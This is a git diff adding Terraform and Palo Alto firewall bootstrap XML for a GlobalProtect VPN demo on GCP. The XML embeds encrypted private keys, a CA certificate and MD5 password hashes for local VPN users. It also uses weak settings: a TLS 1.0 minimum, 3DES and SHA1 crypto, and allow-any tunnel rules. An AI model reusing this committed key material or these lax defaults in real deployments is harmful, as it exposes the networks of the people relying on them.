+        <private-key>-AQ==upj09hPum45JJ00xXyKBB3Q5ZeY=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</private-key>
+      </entry>
+      <entry name="root_CA">
+        <subject-hash>e8d8421e</subject-hash>
+        <issuer-hash>e8d8421e</issuer-hash>
+        <not-valid-before>Mar 24 17:00:47 2020 GMT</not-valid-before>
+        <issuer>/CN=GP-CA</issuer>
+        <not-valid-after>Mar 24 17:00:47 2021 GMT</not-valid-after>
+        <common-name>GP-CA</common-name>
+        <expiry-epoch>1616605247</expiry-epoch>
+        <ca>yes</ca>
+        <subject>/CN=GP-CA</subject>
+        <public-key>-----BEGIN CERTIFICATE-----
+MIICwDCCAaigAwIBAgIJAMn5gXdRd5x1MA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
+BAMTBUdQLUNBMB4XDTIwMDMyNDE3MDA0N1oXDTIxMDMyNDE3MDA0N1owEDEOMAwG
+A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBGFGm
+/Z+y3AcfqmxOn4RJwF7tA7bh1usgi7nZF5/JELLr0fSXvDqk41pT0Kzm3GWcdZ8b
+4kV1aLNfxWleozPGL4Ezl7z4xkc0kcntK3VpkK4+6/16hZBuQF9roqB0my1HlfRG
+eWBf7bye4ARqmiENuSC5YphS4KJOSoZ4h52hcSsXAcmD+FmtoOtckkvEl5TBhMQX
+Gt4N4FOsuUszQtbql6xNDAFmdXc4YajUVkUM3CRcMTRO+A2YbbRzvwUnGA3wueBb
+1C5JQGHd/lTzbEgTmeRDHvIyx8sruMOuYPQbg8d3JxGT6MZcXRCAJHCpWSXg3WZd
+vBoHuk/ZWNKqdMUPAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE
+MA0GCSqGSIb3DQEBCwUAA4IBAQB+eexIJn99kuJpWAVyh/W+pT1Ah52S8fQi/GJc
+DfxELZqsIg7VkkcZFZJ2aefQpoHp4avKyreUsAG6PnkR9DgNZVBJRe0PDxVf6C+T
+1HvE863NThiRUJi3l1GMaI+xQPKg83ceRsqOAqMzYtf/Xq+/XaawCcBei/9bGqpr
+AJHtvcgiO99yaQnu0hQ5K72Dn0v8ABbF6XyCSSuItdsaltS5XAlHp60+Mcq1R1eh
+n01P4VF6sz5Qsdu49743ja4rd68E/Vd+SQoSroZArOwjLE+dNItiPwgL217HQQqx
+6GgUahzsIr9nAQ59i6s3U4WY2bHZqL94GLdJfTq1dIyktMsz
+-----END CERTIFICATE-----
+</public-key>
+        <algorithm>RSA</algorithm>
+        <private-key>-AQ==Lw22pTLfVHUfvaPxm5QAxE/9jX4=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</private-key>
+      </entry>
+    </certificate>
+    <ssl-tls-service-profile>
+      <entry name="gateway-ssl-tls">
+        <protocol-settings>
+          <min-version>tls1-0</min-version>
+          <max-version>max</max-version>
+        </protocol-settings>
+        <certificate>dummy-gw-cert</certificate>
+      </entry>
+    </ssl-tls-service-profile>
+    <authentication-profile>
+      <entry name="local">
+        <method>
+          <local-database/>
+        </method>
+        <allow-list>
+          <member>all</member>
+        </allow-list>
+      </entry>
+    </authentication-profile>
+    <local-user-database>
+      <user>
+        <entry name="gp-user1">
+          <phash>$1$dwadmvhu$fzo/POkYDQ/Z/IKyLtmlX.</phash>
+        </entry>
+        <entry name="gp-user2">
+          <phash>$1$henwxpvq$KjL6f7B5gjVBDTEDT6pB6/</phash>
+        </entry>
+      </user>
+    </local-user-database>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <tunnel>
+            <units>
+              <entry name="tunnel.1">
+                <interface-management-profile>ping</interface-management-profile>
+              </entry>
+            </units>
+          </tunnel>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="ping">
+              <ping>yes</ping>
+              <ssh>yes</ssh>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default"/>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+              </bgp>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>tunnel.1</member>
+              <member>ethernet1/2</member>
+            </interface>
+          </entry>
+        </virtual-router>
+        <tunnel>
+          <global-protect-gateway>
+            <entry name="gateway-N">
+              <local-address>
+                <ip-address-family>ipv4</ip-address-family>
+                <interface>ethernet1/1</interface>
+                <ip/>
+              </local-address>
+              <ipsec>
+                <third-party-client>
+                  <enable>no</enable>
+                </third-party-client>
+              </ipsec>
+              <tunnel-interface>tunnel.1</tunnel-interface>
+            </entry>
+          </global-protect-gateway>
+        </tunnel>
+      </network>
+      <deviceconfig>
+        <system>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <hostname>FW-1</hostname>
+          <server-verification>yes</server-verification>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-1</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="tunnel-zone">
+              <network>
+                <layer3>
+                  <member>tunnel.1</member>
+                </layer3>
+              </network>
+              <enable-user-identification>yes</enable-user-identification>
+            </entry>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <nat>
+              <rules>
+                <entry name="outbound-nat" uuid="43c7b20d-9e42-439b-ac87-4507c833066b">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/1</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>tunnel-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <disabled>no</disabled>
+                </entry>
+                <entry name="inbound-nat" uuid="6ab15c5f-ccb9-4990-9fdb-018ec575b7f9">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>tunnel-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+            <security>
+              <rules>
+                <entry name="allow-out" uuid="7b566aa5-e872-4766-9dc2-3bd675e1e7b1">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>tunnel-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <log-start>yes</log-start>
+                  <disabled>no</disabled>
+                </entry>
+                <entry name="allow-in" uuid="e1f8c20f-2a03-463f-90cf-aa64d618328f">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>tunnel-zone</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>application-default</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>tunnel.1</member>
+                <member>ethernet1/2</member>
+              </interface>
+            </network>
+          </import>
+          <global-protect>
+            <global-protect-gateway>
+              <entry name="gateway">
+                <roles>
+                  <entry name="default">
+                    <login-lifetime>
+                      <days>30</days>
+                    </login-lifetime>
+                    <inactivity-logout>
+                      <hours>3</hours>
+                    </inactivity-logout>
+                    <disconnect-on-idle>
+                      <minutes>180</minutes>
+                    </disconnect-on-idle>
+                  </entry>
+                </roles>
+                <client-auth>
+                  <entry name="default">
+                    <authentication-profile>local</authentication-profile>
+                    <os>Any</os>
+                    <authentication-message>Enter login credentials</authentication-message>
+                  </entry>
+                </client-auth>
+                <ssl-tls-service-profile>gateway-ssl-tls</ssl-tls-service-profile>
+                <tunnel-mode>yes</tunnel-mode>
+                <remote-user-tunnel-configs>
+                  <entry name="default">
+                    <split-tunneling>
+                      <access-route/>
+                    </split-tunneling>
+                    <source-user>
+                      <member>any</member>
+                    </source-user>
+                    <os>
+                      <member>any</member>
+                    </os>
+                    <ip-pool>
+                      <member>192.168.16.10-192.168.16.30</member>
+                    </ip-pool>
+                    <authentication-server-ip-pool/>
+                    <retrieve-framed-ip-address>no</retrieve-framed-ip-address>
+                    <no-direct-access-to-local-network>no</no-direct-access-to-local-network>
+                  </entry>
+                </remote-user-tunnel-configs>
+                <remote-user-tunnel>tunnel.1</remote-user-tunnel>
+              </entry>
+            </global-protect-gateway>
+          </global-protect>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal.tf b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
new file mode 100644
index 00000000..6f6dbe07
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "portal_bucket" {
+  name            = "portal-${random_id.random_number.hex}"
+  storage_class   = "REGIONAL"
+  location        = var.GCP_Region
+  project         = google_project.globalprotect.number
+} 
+resource "google_storage_bucket_object" "portal_bootstrap" {
+  name   = "config/bootstrap.xml"
+  source = "bootstrap-portal/bootstrap.xml"
+  bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_init_cfg" {
+  name   = "config/init-cfg.txt"
+  source = "bootstrap-portal/init-cfg.txt"
+  bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_content" {
+  name   = "content/null.txt"
+  source = "bootstrap-portal/null.txt"
+  bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_software" {
+  name   = "software/null.txt"
+  source = "bootstrap-portal/null.txt"
+  bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_license" {
+  name   = "license/null.txt"
+  source = "bootstrap-portal/null.txt"
+  bucket = google_storage_bucket.portal_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
new file mode 100644
index 00000000..181c989d
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
@@ -0,0 +1,2424 @@
+<?xml version="1.0"?>
+<config version="9.0.0" urldb="paloaltonetworks">
+  <devices>
+    <entry name="localhost.localdomain">
+      <deviceconfig>
+        <system>
+          <update-server>updates.paloaltonetworks.com</update-server>
+          <update-schedule>
+            <threats>
+              <recurring>
+                <weekly>
+                  <day-of-week>wednesday</day-of-week>
+                  <at>01:02</at>
+                  <action>download-only</action>
+                </weekly>
+              </recurring>
+            </threats>
+          </update-schedule>
+          <timezone>US/Pacific</timezone>
+          <service>
+            <disable-telnet>yes</disable-telnet>
+            <disable-http>yes</disable-http>
+          </service>
+          <type>
+            <dhcp-client>
+              <send-hostname>yes</send-hostname>
+              <send-client-id>yes</send-client-id>
+              <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+              <accept-dhcp-domain>yes</accept-dhcp-domain>
+            </dhcp-client>
+          </type>
+          <server-verification>yes</server-verification>
+          <hostname>FW-1</hostname>
+        </system>
+        <setting>
+          <config>
+            <rematch>yes</rematch>
+          </config>
+          <management>
+            <hostname-type-in-syslog>FQDN</hostname-type-in-syslog>
+            <initcfg>
+              <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=</public-key>
+              <type>
+                <dhcp-client>
+                  <send-hostname>yes</send-hostname>
+                  <send-client-id>yes</send-client-id>
+                  <accept-dhcp-hostname>yes</accept-dhcp-hostname>
+                  <accept-dhcp-domain>yes</accept-dhcp-domain>
+                </dhcp-client>
+              </type>
+              <hostname>FW-1</hostname>
+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+          </ethernet>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
